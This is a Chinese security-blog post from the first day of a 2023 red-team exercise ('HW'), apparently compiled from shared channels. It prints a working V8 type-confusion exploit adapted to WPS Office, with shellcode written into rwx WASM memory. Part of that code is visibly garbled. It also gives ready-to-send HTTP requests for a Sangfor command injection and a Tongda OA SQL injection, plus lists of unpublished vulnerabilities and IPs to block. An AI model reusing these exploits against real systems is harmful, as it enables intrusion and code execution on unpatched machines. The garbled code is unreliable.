HW第一天0day以及恶意IP简单汇总



免责声明

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

HW第一天0day以及恶意IP简单汇总

    今天是2023年8月9号周三,HW开始第一天,开头直接上猛料啊,小弟们快受不住咯!


一、今日份漏洞情报


这个WPS的好像群传开了,直接附上,请自测师傅们

1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
<script>if(typeof alert === "undefined"){alert = console.log;}
let f64 = new Float64Array(1);let u32 = new Uint32Array(f64.buffer);
function d2u(v) {f64[0] = v;return u32;}function u2d(lo, hi) {u32[0] = lo;u32[1] = hi;return f64[0];}
function gc(){ // majorfor (let i = 0; i < 0x10; i++) {new Array(0x100000);}}
function foo(bug) {function C(z) {Error.prepareStackTrace = function(t, B) {return B[z].getThis();};let p = Error().stack;Error.prepareStackTrace = null;return p;}function J() {}var optim = false;var opt = new Function('a', 'b', 'c','if(typeof a==='number'){if(a>2){for(vari=0;i<100;i++);return;}b.d(a,b,1);return}' +'g++;'.repeat(70));var e = null;

J.prototype.'a', 'b' J.prototype. J.prototype.

new Function(use strict";b.a. new Function('a' new Function(


l(arguments,b);return arguments[a];'); a.b(0,a)');
'a', 'b','b.c();if(a){' +'g++;'.repeat(70) + '}');J.prototype.c = function() {if (optim) {var z = C(3);var p = C(3);z[0] = 0;e = {M: z, C: p};}};var a = new J();// jit optimif (bug) {for (var V = 0; 1E4 > V; V++) {opt(0 == V % 4 ? 1 : 4, a, 1);}}optim = true;opt(1, a, 1);return e;}
e1 = foo(false);e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];let map = new Map();map.set('asd', 8);map.set(hole, 0x8);
map.delete(hole);map.delete(hole);map.delete("asd");
map.set(0x20, "aaaa");let arr3 = new Array(0);let arr4 = new Array(0);let arr5 = new Array(1);let oob_array = [];oob_array.push(1.1);map.set("1", -1);
let obj_array = {m: 1337, target: gc};
let ab = new ArrayBuffer(1337);let object_idx = undefined;let object_idx_flag = undefined;
let max_size = 0x1000;for (let i = 0; i < max_size; i++) {if (d2u(oob_array[i])[0] === 0xa72) {object_idx = i;object_idx_flag = 1;break;}}
let dv = new DataView(ab);function get_32(addr) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}let val = dv.getUint32(0, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);return val;}function set_32(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint32(0, val, true);oob_array[bk_idx] = u2d(r8[0], r8[1]);}
function write8(addr, val) {let r8 = d2u(oob_array[bk_idx]);if (bk_idx_flag === 0) {oob_array[bk_idx] = u2d(addr, r8[1]);} else {oob_array[bk_idx] = u2d(r8[0], addr);}dv.setUint8(0, val);}
let fake_length = get_32(addrof(oob_array)+12);set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128, 128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128, 128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0 ,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasm_mod = new WebAssembly.Module(wasm_code);let wasm_instance = new WebAssembly.Instance(wasm_mod);let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;let rwx_mem = get_32(target_addr);//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);}f();</script>

360漏洞情报今日更新情况

【演练实时消息】
消息时间:2023-08-09 10:30
消息标题:深信服应用交付报表系统远程命令执行漏洞
消息详情:360漏洞云监测互联网流传:《深信服应用交付报表系统远程命令执行漏洞》 消息,经漏洞云复核,确认为【真实】漏洞。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002368,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

【演练实时消息】
【消息时间】:2023-08-09 11:30
【消息标题】:泛微 E-Cology ifNewsCheckOutByCurrentUser SQL注入漏洞
【消息详情】:360漏洞云监测互联网流传:《泛微 E-Cology SQL注入漏洞》 消息,经漏洞云复核,确认为【真实】漏洞,漏洞细节互联网暂未公开。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002376
,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

师傅们,这个也请自测吧!

POST /rep/login HTTP/1.1 Host: Cookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

【演练实时消息】
【消息时间】:2023-08-09 17:50
【消息标题】:WPS Office 远程代码执行漏洞
【消息详情】:360漏洞云监测WPS Office 远程代码执行漏洞消息及Poc,经漏洞云复核,确认为chromium 历史漏洞(编号:CVE-2022-1364,标题:Google Chrome V8类型混淆漏洞)的适配,影响【WPS Office 个人版<11.1.0.15120,WPS office 企业版<11.8.2.12085 】,最新版本WPS Office 不受此漏洞影响。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002403
,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

这个上面已经附上啦!

【演练实时消息】
【消息时间】:2023-08-09 18:30
【消息标题】:通达OA SQL注入漏洞
【消息详情】:360漏洞云监测到-通达OA SQL注入漏洞(CVE-2023-4166),经漏洞云复核,确认此漏洞为【后台漏洞】,攻击者需要有系统的登录权限,漏洞影响【通达OA<11.10】,官方已经针对此漏洞发布补丁。该漏洞POC已标准化并经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002385,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

师傅们,这个也请自测吧!

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46Upgrade-Insecure-Requests: 1

网络安全攻防WiKi(限免)知识星球的漏洞情报

【2023.8.9】【情报-漏洞预警】【情报来源】:外部【漏洞类型】:二进制漏洞【漏洞危害】:高【情报简述】:IBM SDK Java Technology Edition任意代码执行漏洞(CVE-2022-40609)【漏洞详情】:IBM Software Developers Kit(SDK)中文意思是IBM 软件开发工具包,包含开发工具和 Java™ 运行时环境。SDK 是可安装的 Java 包,其中包含 Java 应用程序编程接口(API)。行业监测到IBM SDK, Java Technology Edition中存在反序列化漏洞(CVE-2022-40609)。IBM SDK, Java Technology Edition中的对象请求代理 (ORB)易受不可信数据的反序列化漏洞影响,未经身份验证的远程威胁者可发送恶意序列化数据,利用该漏洞在目标系统上执行任意代码。【影响范围】:IBM SDK, Java Technology Edition<= 8.0.8.0;IBM SDK, Java Technology Edition<=7.1.5.18 【处置方法】:目前该漏洞已经修复,受影响用户可升级到以下版本:IBM SDK, Java Technology Edition 8.0.8.5;IBM SDK, Java Technology Edition 7.1.5.19
漏洞名称:H3C多系列设备远程命令执行漏洞(QVD-2022-12205)漏洞等级:极危威胁类型:命令执行漏洞类型:命令注入CVE 编号:标签:影响十万级, 在野利用, 关键漏洞漏洞简述:H3C多系列设备存在远程命令执行漏洞。该漏洞是由设备Web控制台某接口存在的逻辑漏洞造成的。凭借此处漏洞即可获取到设备的终端完全控制权限(ROOT 权限)。公开日期:2023-08-08更新日期:2023-08-08 23:37:18
漏洞名称:通达OA 反序列漏洞(QVD-2023-18095)漏洞等级:高危威胁类型:代码执行漏洞类型:反序列化错误CVE 编号:标签:技术细节公开, 关键漏洞漏洞简述:通达OA 由于使用了存在了反序列化漏洞版本的yii框架导致存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。公开日期:2023-08-04更新日期:2023-08-08 18:39:21
Exchange Server远程代码执行漏洞(CVE-2023-38182)风险通告 待补充poc exp描述和影响范围Exchange Server 2019 Cumulative Update 13Exchange Server 2019 Cumulative Update 12Exchange Server 2019 Cumulative Update 11Exchange Server 2016 Cumulative Update 23需要有普通用户权限
Airflow是一个开源的工作流自动化平台,它允许用户定义、调度和监视工作流任务的执行。RunTask是通过Airflow Web界面或命令行工具提供的功能。
Airflow受影响版本中,RunTask功能允许用户手动触发执行特定的任务,而不受正常的任务调度和依赖关系限制。当用户没有执行某个特定任务的权限时,可以通过RunTask功能手动触发该任务的执行,从而绕过本应该实施的访问控制和依赖关系。攻击者可以通过RunTask功能,在目标服务器上执行任意代码。由于DAG定义了任务之间的依赖关系和执行顺序,攻击者可以通过RunTask绕过某些DAG的限制。
影响范围:apache-airflow@(-∞,2.6.0)

红蓝攻防实验室公众号情报

2023HW-Day nday集合

1、海康威视综合安防前台文件上传漏洞2、蓝凌OA前台代码执行漏洞3、致远M3Server-xxxx反序列化漏洞4、致远A8V8SP1SP2文件上传漏洞(1day)5、普元EOS 前台代码执行漏洞6、金和OA sql注入7、泛微E-Mobile任意用户登录(1day)8、泛微E-Office10信息泄露后台+后台文件上传漏洞(0day)很牛的组合漏洞9、契约锁电子签章系统RCE(1day)10、亿赛通电子文档平台文件上传漏洞11、ldocview命令执行漏洞12、jeesite代码执行漏洞0day13、LiveBOS文件上传漏洞14、用友nc-cloud-任意文件写入15、qax VPN 0day16、xxIOA PWN17、xxx准入PWN18、sxf应用交付系统命令执行19、协同办公文档(DzzOfffice)未授权访问20、电子签章平台代码执行漏洞21、泛微oa进后台漏洞22、ucloud的未授权获取任意用户cookie23、飞书客户端RCE漏洞24、泛微EofficeV10前台RCE25、来客推商城任意文件上传26、天玥堡垒机0day27、明御运维审计与风险控制系统堡垒机任意用户注册28、协同管理系统存在SQL注入29、泛微emobile注入漏洞30、拓尔思WCM任意命令执行漏洞31、用友财务云任意文件上传漏洞32、天眼0day(未证实)32、绿盟sas安全审计系统任意文件读取33、Smartbi身份认证绕过漏洞34、泛微Eoffice10 sql注入35、海康综合安防平台-Spring-ENV信息泄露-Restful api默认密钥漏洞36、宏景4个注入2个上传37、红帆OA一堆0day38、泛微E-office do_excel组件存在任意文件写入漏洞39、某御 Leadsec ACM管理平台SQL注入漏洞40、H3C CVM 前台任意文件上传漏洞41、通达OA登录认证绕过漏洞42、TRS-MAS 测试文件远程命令执行漏洞43、宝塔前台远程代码执行漏洞44、某恒数据大脑 API 网关任意密码重置漏洞45、通达OA系统V11.x版本远程代码执行漏洞46、华天动力OA系统前台任意文件上传漏洞47、PbootCMS v3.1.2 远程命令执行漏洞

二、恶意IP(建议封禁)

121.40.127.235 203.56.198.5036.139.90.88111.30.232.23949.232.193.9161.52.4.110175.27.157.249162.14.108.14961.52.1.1878.130.114.73101.43.131.12482.156.151.10442.192.83.3536.139.93.155119.45.116.236118.195.135.8839.104.200.136123.56.94.91115.159.112.16639.100.74.747.92.204.7439.104.205.22547.106.193.231202.114.144.10661.171.119.10639.100.68.739.104.205.7647.99.153.17239.100.69.3239.100.67.4039.100.66.9239.100.67.439.100.71.24047.92.199.2151.13.9.165114.132.55.10939.100.67.168103.252.118.75117.176.227.58171.15.105.211182.92.222.186182.92.171.153101.200.121.24347.94.230.8842.229.37.9439.107.123.19761.181.206.5647.92.146.232180.103.125.4342.194.251.21047.92.193.10439.100.68.2039.100.74.17639.105.189.10049.234.66.241112.126.83.11147.92.222.21539.107.244.1839.98.253.124118.195.252.229101.200.127.65119.91.30.21639.104.22.16339.104.205.209118.195.163.139118.195.151.253118.178.233.24739.100.33.10647.92.153.182118.195.241.144106.55.107.10681.69.18.22847.92.117.14439.98.71.239.98.207.132119.45.197.19939.100.65.171122.230.40.42156.255.214.146115.55.5.25236.27.112.227128.90.186.6349.81.101.13339.144.230.42121.76.146.145115.227.53.22036.63.124.161139.214.148.34218.83.6.211106.58.246.13842.236.134.110220.201.59.247114.253.103.14727.202.246.11242.228.100.149103.225.84.4361.147.96.34219.156.23.17443.154.112.206125.83.104.172180.123.199.17180.125.235.203112.248.113.169113.252.145.146119.162.122.131111.201.175.156182.121.198.15643.137.9.153182.114.24.127125.109.150.118122.142.195.43112.248.244.57180.97.189.166183.27.124.9559.175.107.3458.153.134.157183.157.44.7661.54.61.238111.67.58.3542.238.153.542.239.10.26124.131.32.1142.3.201.56182.127.191.82115.57.30.175223.74.158.84183.27.118.73106.57.165.109219.155.86.248122.140.203.113220.187.194.231221.1.226.15860.246.68.18119.139.137.132182.121.53.223115.171.206.56123.118.11.71123.235.145.137115.60.49.192180.123.198.188180.97.189.153223.15.54.102180.97.189.156222.141.113.12614.18.105.198113.74.128.95122.230.40.5223.16.215.11742.240.129.52222.
137.112.1142.225.48.25125.41.208.109211.101.236.135219.156.153.23918.162.213.61220.192.145.3142.3.201.20242.176.169.245106.110.134.12652.5.118.182185.254.37.216183.136.225.3139.144.228.147223.104.90.135117.61.1.151122.13.77.124119.4.175.235223.104.241.10111.196.58.23839.144.230.203120.216.234.6947.98.172.14447.110.180.3247.110.180.3347.110.180.3447.110.180.35124.77.171.243124.220.162.3642.84.161.64113.160.72.162192.241.222.93192.241.219.50142.93.54.16145.155.91.247205.210.31.3789.248.165.56121.254.147.246112.66.243.13245.137.116.6323.89.5.60104.131.128.14198.199.104.48103.224.212.221104.236.128.30103.224.212.220253.157.14.16545.55.35.5449.2.123.56138.68.133.118154.58.31.66199.254.199.244189.129.149.114118.89.58.55192.241.197.11190.211.252.504.2.2.2212.192.202.119192.241.196.10845.128.232.6283.35.39.231185.200.118.79103.137.63.117202.103.251.246146.19.191.108143.110.192.203190.210.152.14877.4.7.92146.148.34.1255.133.168.15111.192.102.213198.199.107.20196.10.89.62197.4.4.12162.243.136.62105.112.249.195185.200.118.67192.241.232.36112.248.62.247161.97.89.21054.76.135.1165.22.68.119183.136.225.3187.236.176.180107.148.149.146192.241.208.62178.128.227.20489.165.3.27185.200.116.72192.241.204.2649.93.164.238198.199.108.20249.129.46.48107.170.237.74107.170.237.73189.163.17.5185.85.188.62192.155.88.231189.146.237.7388.204.179.118199.254.199.225138.68.208.29190.12.59.131198.98.183.14487.236.176.151118.5.49.6198.199.105.6968.183.13.6189.248.163.20947.92.5.15837.139.129.26103.78.150.209188.5.4.9682.200.154.210162.243.136.42165.232.73.237189.163.152.29192.241.197.21120.78.171.322.57.149.93162.243.134.28

使用需知

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

封面图片来源网络,如有侵权联系必删。

安全小白,不喜绕过。

仅供参考,请勿用于违法行为,如有侵权以及各种情况可以私聊!

原文始发于微信公众号(天启实验室):HW第一天0day以及恶意IP简单汇总
